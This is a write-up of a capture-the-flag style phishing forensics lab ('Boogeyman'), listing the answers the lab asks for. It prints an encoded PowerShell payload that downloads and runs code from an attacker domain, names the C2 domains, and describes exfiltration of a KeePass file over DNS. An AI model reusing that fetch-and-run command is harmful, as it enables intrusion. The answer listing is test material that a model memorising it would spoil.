Unveiling the Boogeyman: A Deep Dive into Threat Analysis
Written on
Chapter 1: Introduction to the Boogeyman Threat
A new threat actor has surfaced, adopting the moniker "Boogeyman." This persona raises concerns in the cybersecurity community. Are you prepared to face the Boogeyman?
In this section, we will explore the details of the incident.
Section 1.1: Key Information from the Attack
To begin our investigation, we must gather some crucial information. Here are the significant details regarding the phishing email involved:
- Sender's Email Address: [email protected]
- Victim's Email Address: [email protected]
- Third-Party Mail Relay Service: The service used by the attacker, as inferred from the DKIM-Signature and List-Unsubscribe headers, is elasticemail.
Subsection 1.1.1: Analyzing the Encrypted Attachment
Within the encrypted attachment, we find a file named Invoice_20230103.lnk. To access its contents, you'll need the following password: Invoice2023!.
Section 1.2: Payload and Domain Analysis
Next, we need to investigate the encoded payload identified in the Command Line Arguments field using the lnkparse tool. The payload is:
aQBlAHgAIAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AZgBpAGwAZQBzAC4AYgBwAGEAawBjAGEAZgBpAG4AZwAuAHgAeQB6AC8AdQBwAGQAYQB0AGUAJwApAA==
For the attacker's file hosting and Command and Control (C2), the domains utilized are:
- cdn.bpakcaging.xyz
- files.bpakcaging.xyz
Chapter 2: Tools and Techniques Used by the Attacker
In our exploration, we note that the attacker downloaded an enumeration tool named seatbelt. Additionally, the attacker accessed a file using the sq3.exe binary located at:
C:\Users\j.westcott\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite
The software associated with this file is Microsoft Sticky Notes.
The second video expands upon the Boogeyman-1 TryHackMe Walkthrough, detailing further insights and methodologies.
Continuing our analysis, we find that the exfiltrated file is named protected_data.kdbx, which is associated with the keepass file type. The encoding method used during the exfiltration of sensitive data was hex, and the tool utilized for this exfiltration was nslookup.
As we delve deeper, we discover that the HTTP method employed by the C2 server for transmitting command outputs was POST and the exfiltration protocol used was DNS.
In summary, the password for the exfiltrated file can be decoded from the TCP stream, while the credit card number stored within it is identified through specific Wireshark queries.
That's all for now! Thank you for joining us in this detailed exploration. See you in the next room!